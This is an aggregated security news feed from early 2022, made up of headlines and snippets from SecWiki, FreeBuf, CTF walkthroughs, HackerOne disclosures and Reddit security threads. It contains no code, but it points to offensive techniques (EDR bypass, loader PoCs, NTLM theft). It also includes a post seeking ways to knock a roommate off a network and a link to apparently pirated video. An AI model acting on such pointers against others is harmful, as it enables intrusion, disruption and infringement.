    Yasso: 强大的内网渗透辅助工具集 by ourren SecWiki周刊(第411期) by ourren 中国(大陆)虚拟货币犯罪形态分析报告-2021年度 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-17 Review
    Yasso: 强大的内网渗透辅助工具集 by ourren SecWiki周刊(第411期) by ourren 中国(大陆)虚拟货币犯罪形态分析报告-2021年度 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    DailyBugle TryHackMe Walkthrough
    Introduction DailyBugle is a CTF Linux box with difficulty rated as “medium” on the TryHackMe platform. The machine covers Joomla 3.7.0 SQL injection vulnerability and The post DailyBugle TryHackMe Walkthrough appeared first on Hacking Articles.  ( 4 min )
  • Open

    DailyBugle TryHackMe Walkthrough
    Introduction DailyBugle is a CTF Linux box with difficulty rated as “medium” on the TryHackMe platform. The machine covers Joomla 3.7.0 SQL injection vulnerability and The post DailyBugle TryHackMe Walkthrough appeared first on Hacking Articles.  ( 4 min )
  • Open

    ThinkPHP框架渗透实战
    thinkphp在开启debug模式下如果服务器开启了数据库外联,可以通过爆破mysql服务发送大量请求(让mysql堵塞)。  ( 1 min )
    FreeBuf早报 | 沃尔玛低调入局元宇宙;Safari 浏览器漏洞允许跨站点跟踪用户
    沃尔玛将向用户提供虚拟货币和NFT。  ( 1 min )
    国产计算机外设及信创产品安全竞赛,斗象荣获“优秀组织奖”
    斗象荣获2021年“网络安全众测平台”国产计算机外设及信创产品安全竞赛“优秀组织奖”
    冬奥会倒计时!斗象“网安保障军团”使命必达
    斗象科技为数十家央国企单位提供冬奥前的网络安全评估服务与冬奥期间的防守值守服务,全力保障冬奥会核心系统与网络资产的安全。
    《网络安全产业人才岗位能力要求》标准正式发布
    标准正文内容分为六个部分,包括标准的适用范围、规范性引用文件、涉及的术语和定义、主要方向及岗位、能力要素等多个方面。
    知名软件被利用,小心主机被开后门
    攻击者通过网络钓鱼的手段诱导受害者点击运行邮件中附带的木马程序,结合正常的Adobe CEF Helper程序进行攻击。  ( 1 min )
    什么是SSL剥离攻击?
    SSL剥离攻击是一种网络攻击,黑客攻击将Web连接从比较安全的HTTPS降级到不太.安全的HTTP。  ( 1 min )
    欧盟针对一家“虚拟”电力公司进行了网络攻击演习
    欧盟上周对芬兰一家“虚拟”电力公司进行了一次模拟网络攻击演习。
    全国信安标委征求国家标准《信息安全技术 重要数据识别指南》(征求意见稿)发布
    《指南》明确了“重要数据”的定义,是指以电子方式存在的,一旦遭到篡改、破坏、泄露或者非法获取、非法利用,可能危害国家安全、公 共利益的数据。  ( 1 min )
    俄罗斯声称已经捣毁知名勒索软件团伙REvil
    俄罗斯联邦安全局(FSB)宣布已捣毁REvil勒索软件团伙,该团伙是针对大型组织(如Kaseya和JBS USA)的一系列攻击的幕后黑手。
    2022年网络安全趋势:7个趋热,2个趋冷
    2022 年的九大安全趋势,预计在新的一年里攻击的范围和复杂程度将会变得更加难以应对。  ( 1 min )
    聚类算法有哪些?又是如何分类?
    想要了解聚类算法并对其进行区别与比较的话,最好能把聚类的具体算法放到整个聚类分析的语境中理解。  ( 1 min )
    2020及2021年常被利用的30个软件漏洞
    对于所有的0day,定制的恶意软件和其他完全未知的安全漏洞,它们已经存在多年并被广泛利用。  ( 1 min )
  • Open

    Android Application Malware Analysis
    submitted by /u/Apprehensive_Gap6036 [link] [comments]  ( 1 min )
  • Open

    Ejecución dinámica con DInvoke
    Tras varios meses de desarrollo y una vez añadidas las últimas funcionalidades al proyecto, creo que Dinvoke_rs está preparado para que… Continue reading on Medium »  ( 7 min )
  • Open

    Domain Persistence – Machine Account
    Machine accounts play a role in red team operations as in a number of techniques are utilized for privilege escalation, lateral movement and domain escalation.… Continue reading → Domain Persistence – Machine Account  ( 6 min )
    Domain Persistence – Machine Account
    Machine accounts play a role in red team operations as in a number of techniques are utilized for privilege escalation, lateral movement and domain escalation.… Continue reading → Domain Persistence – Machine Account  ( 6 min )
  • Open

    Domain Persistence – Machine Account
    Machine accounts play a role in red team operations as in a number of techniques are utilized for privilege escalation, lateral movement and domain escalation.… Continue reading → Domain Persistence – Machine Account  ( 6 min )
    Domain Persistence – Machine Account
    Machine accounts play a role in red team operations as in a number of techniques are utilized for privilege escalation, lateral movement and domain escalation.… Continue reading → Domain Persistence – Machine Account  ( 6 min )
  • Open

    My Pentest Log -3-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
  • Open

    My Pentest Log -3-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )

  • Open

    How do cryptocurrency exchanges like Coinbase defend against man in the middle attacks (MItM)?
    Referring specifically to applications like Evilginx that create fake log in pages and collect session cookies. A session cookie is what the website gives you after you complete signing in (username + password + 2FA) to remember that you did. The tool collects this cookie and passes it to the hacker if you're foolosh enough to use their fake log in page. Do Coinbase, Binance, etc have any protections in place to defend against this? Inb4 don't be stupid: some people are stupid. They deserve to not be robbed. submitted by /u/iExtrapolate314 [link] [comments]  ( 2 min )
    Just completed my Security+.What's should I do next
    Just completed my Security+ and not sure what I should do next.Interested more in Blue team than red team. submitted by /u/Linux98 [link] [comments]  ( 1 min )
    Facebook lite app whitehat settings guide
    Hi, I'm trying to follow Facebook guide to intercept Facebook lite android application which uses binary protocol instead of http. I'm using burp on linux. The section is called "Enable settings from Facebook Lite on Android" https://www.facebook.com/whitehat/education/testing-guides I'm stuck with NoPE Proxy extension which intercept traffic. The enable checkbox can't be checked, even if I launched burp as root. https://i.ibb.co/1TN0jgz/1.png In wireshark I get, port unreachable after I set my phone dns to my machine IP as mentioned in fb guide. https://i.ibb.co/q0vfStt/2.png Help, please! I want to intercept Facebook lite android application traffic ! submitted by /u/Spare_Prize1148 [link] [comments]  ( 1 min )
    Information Security Analyst questions
    Is Information Security Analyst the same as Cyber Security? Can I work in Information Security and be Information Security Analyst with bachelor IT degree plus certifications? Can I work in Cyber Security field and be Cyber Security with bachelor IT plus certifications? Can I get into Information Security Analyst and/or Cyber Security field without a degree at all? What certifications you guys recommend? I am thinking doing CompTIA Security+, but first I need to get training going: https://www.comptia.org/training/by-certification/security What is your salary, experience year, and state? Anyone live in FL and doing Information Security Analyst can give me insight of this job market situation in FL. Is it bad? How is the pay? What do you do in this field? Is it hard? Is this career good though? submitted by /u/OlympicAnalEater [link] [comments]  ( 3 min )
    Endpoint security confusion
    I have heard a lot of fuss going around regarding endpoint security. Having a background in IT development, I figured that this is what was meant: Https://somepage.com /login.php <--- endpoint But after a little bit of googling it sounds like it has nothing to do with endpoints. Could somebody explain this to me? Or what to search for? submitted by /u/kusichta [link] [comments]  ( 2 min )
    Do you include CVEs on your resume?
    If you have “accredited” CVEs how do you list them on your resume? Do you link to the NIST website or to a security advisory with your name in it? Thoughts? submitted by /u/BadCSCareerQuestions [link] [comments]  ( 1 min )
  • Open

    You're running untrusted code!
    submitted by /u/nfrankel [link] [comments]  ( 1 min )
    Free copy of The ssh Plumber's Handbook
    submitted by /u/markcartertm [link] [comments]  ( 2 min )
  • Open

    Previse HackTheBox Walkthrough
    Introduction Previse is a CTF Linux box with difficulty rated as “easy” on the HackTheBox platform. The machine covers bypassing access control, OS command injection, The post Previse HackTheBox Walkthrough appeared first on Hacking Articles.  ( 5 min )
  • Open

    Previse HackTheBox Walkthrough
    Introduction Previse is a CTF Linux box with difficulty rated as “easy” on the HackTheBox platform. The machine covers bypassing access control, OS command injection, The post Previse HackTheBox Walkthrough appeared first on Hacking Articles.  ( 5 min )
  • Open

    Digital forensics: Investigation VS Security
    submitted by /u/Apprehensive_Gap6036 [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-16 Review
    安全学术会议排行榜(2021版) by ourren Graph Embedding实战系列:Node2vec原理与代码实战 by ourren 初识WebAssembly by ourren 现代网络犯罪模式解读 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-16 Review
    安全学术会议排行榜(2021版) by ourren Graph Embedding实战系列:Node2vec原理与代码实战 by ourren 初识WebAssembly by ourren 现代网络犯罪模式解读 by ourren 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Bug Type: HTML injection in confirmation Email !
    Hey Everyone! This is about another low-hanging fruit (I’m still not a pro) in one of the web applications listed by OpenBugbounty. Continue reading on Medium »  ( 2 min )
    Advanced persistent threat (APT)
    When a system is under attack, Most of people think it as a one-time transfer. when a hacker finds a way to enter into the system, he… Continue reading on Medium »  ( 1 min )
    WTF IS IDOR!?
    One of the most crucial Vulnerabilities listed in top 10 of OWASP is Insecure Direct Object Reference Vulnerability (IDOR Vulnerability)… Continue reading on Medium »  ( 3 min )
    Authentication Bypass -TryHackMe
    Writeup Continue reading on InfoSec Write-ups »  ( 2 min )
    How i was able to see Sensitive Information on One of the India’s best School Website.
    Hello Readers, Continue reading on Medium »  ( 2 min )
    Beginner Bug Bounty Guide
    Below is a flow diagram based on my experience on how you should start your bug bounty journey. Irrespective of your technical background… Continue reading on Medium »
  • Open

    Dark Web Scraping by OSINT - Scraping & Tools
    ➢ Dark Web Scraping & Tools Continue reading on Medium »  ( 5 min )
    Dark Web Scraping by OSINT - Darknet & TOR
    ➢ History of the Dark Web Continue reading on Medium »  ( 4 min )
    Dark Web Scraping by OSINT - OSINT & Hidden Internet
    ➢ What is OSINT? Continue reading on Medium »  ( 2 min )
  • Open

    DIY wood chippers
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    I couldn't think of a title so here is a start a long long of music..Feeling sublime? Dont be a tool.I have the cure, If you go three doors down you might see some bare naked ladies!
    submitted by /u/Yankeeslv [link] [comments]  ( 1 min )
  • Open

    FreeBuf早报 | 未来三年中国网安市场将保持15%以上增速;Linux 恶意软件在 2021 年增长 35%
    中国网络安全产业联盟发布了《中国网络安全产业分析报告(2021年)》,预测未来三年,网络安全市场将保持15%以上的增速,到2023年市场规模将超过800亿元。  ( 1 min )
  • Open

    Lack of URL normalization renders Blocked-Previews feature ineffectual
    Slack disclosed a bug submitted by jub0bs: https://hackerone.com/reports/1102764 - Bounty: $1000
  • Open

    Cerbersec/Ares: Project Ares is a Proof of Concept (PoC) loader written in C/C++ based on the Transacted Hollowing technique
    submitted by /u/dmchell [link] [comments]
  • Open

    Are there examples where two apps together on a device introduced a vulnerability where neither alone necessarily would?
    I'm looking for examples where the interplay between two apps led to a vulnerability which wouldn't exist if either of these apps were present alone. I can think of a contrived ways on paper where something like this could happen, e.g. App A creates what it thinks is a uniquely named file and places it somewhere common. App B uses that same file name + path and does limited/no checking that it's created by App B and not another app and leads to undesirable effects. (One could argue this is a vulnerability in App B by itself but) But are there actually examples where something like this has happened? Someone's banking app is compromised because they also have the Delta app on their phone, etc. etc. Thanks for satiating my curiosity. submitted by /u/CorbinGDawg69 [link] [comments]  ( 1 min )

  • Open

    How i found “Broken Access Control Through out-of-sync setup” and got $1000
    Hello everyone ! , Hope you all are doing well, I would like to share my “Broken Access Control Through out-of-sync setup” Continue reading on Medium »  ( 6 min )
  • Open

    BreadMan Module Stomping & API Unhooking Using Native APIs
    submitted by /u/dmchell [link] [comments]
  • Open

    Need your ideas for my Master's year project
    My project is on Honeypot, so basically what I did till now is, I have deployed T-Pot Honeypot on my machine and started getting attacks on it and my plan is to create firewall against those attacks. I am also thinking to to do a comparison analysis of SIEM tool : ELK and Splunk but not sure I should do it or not. So, I need you to give some more ideas like what else can be done and how should I create firewall? Thanks in advance. submitted by /u/GuireccSS [link] [comments]  ( 1 min )
    Blocking DNS over HTTPS
    basically 443 already headache since cannot decrypt traffic for all of devices but i think DNS over HTTPS is one of the important items. Anything can be done besides manually blocking some known dns providers list? Adding note: Purpose is network security, dont want dns over http on the network. I know not only dns can be passed through 443 but this seems like most important submitted by /u/shodanless [link] [comments]  ( 2 min )
    Creative ways to knock someone off router using too much bandwidth?
    We have pretty slow internet at our house and it’s split across myself and a few roommates. One roommate in particular is doing…something where the bandwidth my other roommate and I get basically drops to zero for hours on end. We’ve asked them to be more considerate, and they don’t seem interested in sharing what awful internet we have. Obviously we could just log into the router and blacklist his devices, but the router is in his room, so he can just unplug it and then we’re all screwed. What are some more “creative” ways to knock his devices off the network, or otherwise prevent them from hogging all the bandwidth on the network, that doesn’t involve access to the router? Edit: I appreciate the great advice coming out of AskNetsec about communication and other interpersonal skills, loving the high empathy in this community. That said, let’s keep this to a very narrow threat model with the assumption that: the roommate is unwilling to communicate installing any new hardware is impossible access to the router is impossible buying a 2nd internet connection is impossible The model therefore should be the targets computer, which must be impacted by the actors computer directly, through the router possibly, but without changing any settings on it submitted by /u/JamieOvechkin [link] [comments]  ( 5 min )
    Who do we hire and why?
    Some of the past subjects and replies seems to imply there are alot of questions on what is a qualified cyber security employee. So lets try to help the boys and gurls that want to enter this career and are not sure of what we are looking for. So for all you hiring managers and anyone that was involved in hiring decisions for Cyber Security hires in the past 5 years(Pre and post covid) Please answer the following questions and lets see if we can give the prospects some ideas on what they need vs what they think they need. 1. Industry, job title/descriptions and ball park salary. Education – Cyber Security Jr Analyst, assist the cyber security team in daily duties. $35k Auto Motive – Sr Cyber Security Engineer, SME in Email, cloud EDR/XDR, C level reporting and mentoring. $150k Auto Mot…  ( 4 min )
    did 1.1.1.1 is a vpn?
    submitted by /u/Environmental_Camp24 [link] [comments]  ( 1 min )
    Secure Boot is silently disabled after a BIOS upgrade
    Hi. I'm new to this subreddit, so I'm not sure if my question is appropriate here. Feel free to direct me to another subreddit. After installing the beta version 7B86vAG4 of the BIOS for my MSI B450-A PRO motherboard, Secure Boot silently stopped working. That is, it boots any OS, for example, the Arch Linux installation medium. I see this behavior with factory default Secure Boot keys which likely are MSI's and Microsoft's keys and with my own keys. But keys shouldn't matter since the Arch Linux installation medium isn't signed by anybody: The official installation image does not support Secure Boot (FS#53864). To successfully boot the installation medium you will need to disable Secure Boot. source I reverted to the version 7B86vAD where Secure Boot works as expected. The last reply from the MSI support was: I: I do not use Windows at all. Support: Generally speaking, the secure boot won't take effect if you system cannot be supported. Please don't worry about it. Thanks! Well, I don't think I shouldn't worry about that. Secure Boot should work irrespective of the OS in this case since the OS isn't even booted. There are many people using Secure Boot with Linux. I would like to know whether this is just my motherboard or I set up Secure Boot incorrectly. If it's not just me, I feel obliged to report this bug somewhere. A user won't see it if they set up Secure Boot before upgrading their BIOS. submitted by /u/beroal [link] [comments]  ( 1 min )
    Do you allow google docs to your employees on the LAN?
    Hi Folks As we all know Google Drive/Docs/Sheets, Dropbox or any other cloud storage are major vectors for malware so we are blocking them in our corporate LAN. Lately, our organization employees satisfaction department in HR started conducting surveys using Google doc by sharing link with all employees and asked IT department to ensure it is working on all desktops. Is it safe to allow ? I understand there are security risks but a business demand on the other hand that needs to taken care of. Can someone give second thought on this please? Would love to have your valuable inputs submitted by /u/techno_it [link] [comments]  ( 2 min )
    Best automated pen testing software
    Hi folks, I have a vendor that will require me to open an application to the web for credit card processing. I don't believe they're taking security seriously so I'm currently looking at hiring a vendor to do penetraton testing for that app through the firewall. However, if the bids come in too high, and just for ongoing testing in general, I'd like to learn what knowledgeable folks use for automated penetration testing. Please don't say, "Kali" unless you can help me with a specific program I can use on that veritable swiss army knife of hacking tools. :) Thanks in advance! submitted by /u/Leeto2 [link] [comments]  ( 3 min )
    HELP! Should I consider myself hacked/go into panic mode over this?
    Three months ago I received a newsletter from AltCoinTrader.co.za on my Gmail inbox. However, I never signed up for this site. I initially brushed it off for peace of mind. But I keep getting scared every time I remember it so I wanted to finish it by contacting the sites support and ask if my email was ever registered with them. To my horror, they said that someone did register but did not activate the account in May 2020. However, I could not find an activation email in my inbox, which has me worried that someone does have access to it and deleted it before I could see it. It is unlikely to be me since I wrote an email around the same time and other useless emails at that time period are still there. I have switched PCs since May 2020, but have kept my phone. My Gmail also has a new password + 2FA now. However, the new PC did share the same network briefly with my old PC. I very recently re-opened my old PC and did a thorough malware scan. Unfortunately, it found 3 Trojans. Current PC has had a clean bill of health so far. Problem is I have done very sensitive stuff on that PC from credit card details, SSN, online banking passwords, and, worst of all, confidential information for my work, including customers' personal data. I still don't know if I should treat this as a confirmed hack and/or full-on panic. Aside from this anomaly and the Trojans, the only other weird thing is my phone keeps logging account activity by itself sometimes (which I assume is it just pinging Google servers). Apart from that none of my accounts showed any signs of compromise. I also consulted someone earlier who said the Trojans could possibly be unrelated. And it is unclear what the motive is for someone to use someone else's email for crypto trading and log in to the account only to delete the confirmation email. Please help me with this. This is so strange, and a lot is at stake if I was compromised. I might actually get hospitalized over the stress from this. submitted by /u/WrestleMaykr [link] [comments]  ( 2 min )
    Wordlist Generation for Password Cracking
    I have been researching software to use to generate wordlists for password cracking but haven't been able to find one that generates passwords given parameters (birthday, hobbies, etc.) Does anyone know of any software that can do this or should I just try to create my own? Thanks in advance submitted by /u/Odd_Rip6706 [link] [comments]  ( 1 min )
    Being aggressively targeted how can I make a VM that cannot put anything on my host machine?
    Hello everyone first off I just want to say great community, second of all, I have a question that needs severe attention. Me and my father are being aggressively targeted from malware writers for a reason I don't want to reveal, we didn't do anything bad, we aren't bad people, it's because of what we have. I would rather not spend the money for Sophos Sandstorm, or any of the other costly products out there when this can all be done open source, and with some smart minds. I need to have Windows 10 on my machine for business software unfortunately, or I'd jump to Linux. Either way, I am still a target. I need to put a VM on my machine (if thats the best way to do this, if not please say so), or multiple VM's. I need to know which VM to use, and how to make it so that if I do get malware on my VM, which I would be using all the time, it will not be able to pass through and attach itself on to my host machine. How exactly is this possible, and what settings do I need to set, what Linux distro should I use, and will I be safe using the business software which is Win10 only on a VM? I can use the software with my Ethernet unplugged, and I have no WNIC on my PC. ​ Thank you very much for your help, it is appreciated more than you know. submitted by /u/pixeldev [link] [comments]  ( 4 min )
    Issues with GIAC labs?
    I have a buddy who is studying for a giac exam who says the labs on the practice tests are trash. Can anyone confirm this? Is this a common issue? submitted by /u/sephstorm [link] [comments]  ( 1 min )
    deleted google account
    i am trying to recover data from a deleted google account. i have local law enforcement requesting all data related to the google account. are we going to be able to recover deleted emails and other files? submitted by /u/LS2fast [link] [comments]  ( 1 min )
  • Open

    Toolbox HackTheBox Walkthrough
    Introduction Toolbox is a CTF Windows box with difficulty rated as “easy” on the HackTheBox platform. The machine covers SQL injections, gaining interactive shell, escaping The post Toolbox HackTheBox Walkthrough appeared first on Hacking Articles.  ( 4 min )
    Multiple Files to Capture NTLM Hashes: NTLM Theft
    Introduction Often while conducting penetration tests, attackers aim to escalate their privileges. Be it Kerberoasting or a simple lsass dump attack, stealing NTLM hashes always The post Multiple Files to Capture NTLM Hashes: NTLM Theft appeared first on Hacking Articles.  ( 5 min )
  • Open

    Toolbox HackTheBox Walkthrough
    Introduction Toolbox is a CTF Windows box with difficulty rated as “easy” on the HackTheBox platform. The machine covers SQL injections, gaining interactive shell, escaping The post Toolbox HackTheBox Walkthrough appeared first on Hacking Articles.  ( 4 min )
    Multiple Files to Capture NTLM Hashes: NTLM Theft
    Introduction Often while conducting penetration tests, attackers aim to escalate their privileges. Be it Kerberoasting or a simple lsass dump attack, stealing NTLM hashes always The post Multiple Files to Capture NTLM Hashes: NTLM Theft appeared first on Hacking Articles.  ( 5 min )
  • Open

    IndexedDB in Safari 15 leaks your browsing activity in real time
    submitted by /u/Synchisis [link] [comments]  ( 1 min )
    A Detailed Guide to cracking the OSWE Certification
    submitted by /u/YashitM [link] [comments]
    10 real-world stories of how we’ve compromised CI/CD pipelines
    submitted by /u/digicat [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-15 Review
    端到端模型在人员流失预警场景的实践 by ourren 互联网领域黑产常见攻击手法初探 by ourren Zeek - Detect Godzilla WebShell by ourren 云防火墙产品的演进思路 by ourren MSF+生成流量免杀木马 by ourren 剖析海莲花组织恶意文件定制化策略 by ourren r3kapig技能栈1.0 by ourren X通信息安全培训体系建设 by ourren ATT&CK Techniques to Security Events by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-01-15 Review
    端到端模型在人员流失预警场景的实践 by ourren 互联网领域黑产常见攻击手法初探 by ourren Zeek - Detect Godzilla WebShell by ourren 云防火墙产品的演进思路 by ourren MSF+生成流量免杀木马 by ourren 剖析海莲花组织恶意文件定制化策略 by ourren r3kapig技能栈1.0 by ourren X通信息安全培训体系建设 by ourren ATT&CK Techniques to Security Events by ourren 更多最新文章,请访问SecWiki
  • Open

    science books & papers
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Google Search operators
    Does anyone know of a good website or document explaining these Google commands? http://www.googleguide.com/advanced_operators_reference.html How to put them together and explaining the difference between inurl and -inurl? Do I put the file types in brackets, (.mkv|.mp4|.avi|.mov|.mpg|.wmv) like this or does it matter? IE; intext:"chernobyl" intitle:"index.of" (wmv|mpg|avi|mp4|mkv|mov) -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) or +(.mkv|.mp4|.avi|.mov|.mpg|.wmv) chernobyl intitle:"index of" -inurl:(jsp|pl|php|html|aspx|htm|cf|shtml) Note; commands are in a different order. Does order mater? The above link only explains one command at a time but, apparently you can compound these commands to be more specific. Thanks for your input... submitted by /u/klutz50 [link] [comments]  ( 1 min )
    Movies (2020, 2021), some Series and Anime
    http://smart-playtv.fr/VOD/ submitted by /u/gimvaainl [link] [comments]

  • Open

    Autopsy with wireshark
    Can you import pcap files from wireshark into Autopsy? is there an expansion to do this? submitted by /u/swatteam23 [link] [comments]  ( 1 min )
    Cellebrite 4PC PC requirements
    LE that is just about to become my departments first and sole cellebrite user. We are putting a budget together (cellebrite's sales people are annoyingly hard to get in contact with) and we've got our prices ballparked and everything looks good except a computer build. We've talked with 2 other cellebrite users who both said they had to buy a $4-5k desktop build to work efficiently with cellebrite. I've built a pc before and have a basic knowledge about them, however I don't get these $4k+ build costs when all that's really necessary is an average build with an intell processor and a decent amount of ram. Besides that I have put in a good chunk of the budget to cover memory and additional hard drives to handle data/evidence. Are the other cellebrite users just getting railroaded by vendors selling them over priced pre-built models or is there something more to the build/requirements. Any advice would be greatly appreciated. submitted by /u/crimsontidepride [link] [comments]  ( 4 min )
    Secure storage identification
    A follow-up to my previous post, can confirm that the premium tools are able to obtain contents of the secure storage. I did find a product that will tell you if secure storage is in use. Wondering if anyone knows how to manually determine whether secure storage is in use besides relying on the product to tell you? submitted by /u/scrappybytes [link] [comments]  ( 1 min )
  • Open

    [available] Calculus: Early Transcendentals Ninth Edition
    submitted by /u/joey-sm [link] [comments]
    Rob's stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Massive collection of music (mostly not well known artists)
    Update: Ok, i did not know the links redirected to Amazon (As i do not download mp3 files usually) What caught my attention was the bands names that i did not know about submitted by /u/SexRevolutionnow [link] [comments]  ( 1 min )
    photos of toronto
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
    Bolivian buses
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]  ( 1 min )
  • Open

    In orginization stored xss using location (Larksuite survey app)
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/998138 - Bounty: $500
    Stored xss on helpdesk using user's city
    Lark Technologies disclosed a bug submitted by imran_nisar: https://hackerone.com/reports/971857 - Bounty: $500
    SQL Injection and plaintext passwords via User Search
    IBM disclosed a bug submitted by xyantix: https://hackerone.com/reports/703819
    Deserialization of potentially malicious data to RCE
    Django disclosed a bug submitted by scaramouche31: https://hackerone.com/reports/1415436
  • Open

    tlsmate: tool to scan TLS servers for their configuration weaknesses and vulnerabilities
    submitted by /u/CantSayThatMuch [link] [comments]
    A Deep Dive into The Grief Ransomware’s Capabilities
    submitted by /u/CyberMasterV [link] [comments]  ( 1 min )
  • Open

    What are the chances that I get a job abroad after graduating?
    Hey there, I'm from Tunisia (north Africa) I graduated a few months ago majoring in cyber security (I have a 3y degree in network administration and a 3y degree in security). I didn't start looking for a job until these past few days due to a personal problem in the family, but now I'm wondering what are my chances to find a job abroad. The usual destination for us is France but tbh I'm looking for somewhere else, anywhere in Europe,the US or even (uuum especially) Australia. I got 3 CCNA certs and my English is pretty good.The thing is my experience is limited to school projects and 2 internships where I touched on the real world work. I'm not posting my CV unless requested, I'm not here looking for a job (and I don't want to break any rule) but I'm here to ask. Please keep in mind the COVID situation in the world right now which I think is reducing the travelling potential. Thanks in advance. submitted by /u/Dalleuh [link] [comments]  ( 1 min )
    What tools do you use to audit AD users?
    What tools do you use to audit users on AD? For example, a list of those who haven't logged in for a very long time, or who haven't changed their password in a long time, or who are without 2FA. To be honest, I did not find such functionality in AD (or if I did, it was inconvenient). submitted by /u/athanielx [link] [comments]  ( 2 min )
    Appsec engineering at Meta/Facebook - how is the work?
    Hi, I'm wondering how is the work of application security engineers at meta/fb? Do they write code? or only do code reviews? What are the usual tasks of an engineer in such role? submitted by /u/sapup [link] [comments]  ( 1 min )
    CEO scam solution?
    Problem is: fake CEO or Senior Officials social media profiles are used too scam ("pay this fee to get this job"). - What solutions could monitor web/social media to find such fake profiles or websites? - Would these solutions find this? or is it something into social media/web monitoring? Thank you for the answers submitted by /u/NerdSupremacist [link] [comments]  ( 1 min )
    What's the name of this app that displays your other usernames?
    Few years ago, a friend of mine was travelling in GCC. (Gulf States) His friend showed him an app where he fed my friend's phone number and all his social ids popped up. All the different usernames he has been using, on other social media platforms, going back to several years. The sites that he remembers his id from - Grindr, Manjam, Gaydar, Badoo etc. Does anyone knows what is this thing called? or what is the name of such app? submitted by /u/saffrown [link] [comments]  ( 1 min )
    Newbie with a couple questions about the CEH v11!
    Top of the mornin to ya fellow cyber lads and ladies! I'm hoping to take the ANSI v11 exam in the next three months or so and I have the following questions. Is 3 months enough of a prep time if I have a B.S. in Cybersecurity? (From what I hear, the ANSI is just a glorified Sec+) Access to the ilabs, The Textbook, Messier's Practice Tests, Messier's Study Guide, O'Reilly's Videos and Messier's v10 videos on Udemy. Will this do for prep material? Question about CEH Practical here. Will the Practical exam be a good first step on a year long journey to the OSCP? Tenks. submitted by /u/Puddin2yerHarley [link] [comments]  ( 1 min )
    TikTok is hideous...but unfortunately necessary for engaging with my readers. Any advice?
    I generally hate social media. It's toxic, predatory, and spying on the user 95% of the time. Unfortunately it's also a necessary engagement channel for writers. I've banished it from my personal life but unfortunately need to be able to connect with readers and market my stuff. I recently paid for a session with a social media consultant that was aghast I was not on TikTok. I explained my political concerns with TikTok's links to certain authoritarian governments, as well as the massive data-mining hard-cooked into the code, and the evidence it's detrimental to mental health. She looked at me like I was a caveman wearing a tinfoil hat and went on to show me some metrics. Sadly it became clear that most of the reader demographic I'm trying to market my content to are using TikTok almost exclusively as their drug of choice. Fuck. So here's my question/TLDR: Is there a third-party application or method of "corralling" TikTok's spying functions? Is it possible to post via a desktop browser and bypass the application entirely? Should I look into running it inside an emulator? I'd certainly appreciate any input or suggestions! Who knew cyberpunk dystopia could be so banal. submitted by /u/writtenloudly [link] [comments]  ( 5 min )
    Salary range for Jr Security Analyst at Bay Area CA
    Hi all, I was wondering what would be the salary range for Junior security analyst position at the Bay Area California? Is 100k asking too much? The cost of living is really expensive there, so I’m not so sure. Any help is appreciated! submitted by /u/nkookie [link] [comments]  ( 2 min )
    Need your suggestion for this scenario to withstand port scanning
    We have a hosted website which has multiple subdomains though about 1000. Recently a security research company started running port scans and this is affecting our website health. With some page going down and the CPU usage crossing threshold. Basically we the application is deployed in AKS(k8s) and the backends are behind the Azure Front Door and some subdomains are managed by Global Traffic Manager as well all on Azure. Unfortunately we cannot stop these scans however we have been asked to change our design or solution as the port scanner hit every subdomain at the same point which all of them points to a single host and this is causing the issue. Need your advice or suggestions on how we can overcome and withstand the port scans without affecting our site. How to load balance this scenario in a much efficient way submitted by /u/SnooGoats8879 [link] [comments]  ( 1 min )
    Favourite CSPM?
    CSPMs are a must in enterprise environments these days. Based on my initial research, prisma cloud and orca security stand out. Are there any specific CSPMs that you'd recommend besides these two? submitted by /u/DryPath [link] [comments]  ( 1 min )
    Taken care of the parents
    I have an odd one and am looking for some advice. My parents are getting on in age and I am looking for a solution to help monitor their phones and give them remote support when they need it. I am going to hook them into my family plan with Lastpass to help them with passwords but is there anything for android that is the equivalent of LogMeIn? Also more of a general question but how do you all care for your parents tech wise? Not sure if I am over stepping my boundaries bud I've already had one family fall prey to a scammer. submitted by /u/OakenRage [link] [comments]  ( 1 min )
  • Open

    Nim variant of MDSec's Parallel Syscalls EDR hook bypass
    submitted by /u/DarkGrejuva [link] [comments]
    Exploit Kits vs. Google Chrome - Avast Threat Labs
    submitted by /u/dmchell [link] [comments]
  • Open

    SecWiki News 2022-01-14 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    SecWiki News 2022-01-14 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki  ( 2 min )
  • Open

    Bug Alert —Critical Vulnerability Alerting System
    High impact vulnerability notification over email, phone call, or SMS Continue reading on Medium »  ( 2 min )
    My Pentest Log -2-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
    True Life: Recovering Bug Bounty Hacker: Chapter 1 — GoodRx
    I decided to start a series about the experiences I’ve had with bug bounty programs. I wanted to first start off with the written story so… Continue reading on Medium »  ( 8 min )
  • Open

    Honeypot Discussions Part-2
    Honeypot Types Continue reading on Medium »  ( 4 min )
    Powershell Execution Strategy
    What is powershell execution strategy Continue reading on Medium »  ( 6 min )
  • Open

    My Pentest Log -2-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
    Go 1.18 — native Fuzzing and Dinosaurs
    Last month, the Go language team released the Go 1.18 Beta 1. It contains the much awaited generic support, which we’re very excited to… Continue reading on Medium »  ( 4 min )
  • Open

    My Pentest Log -2-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 1 min )
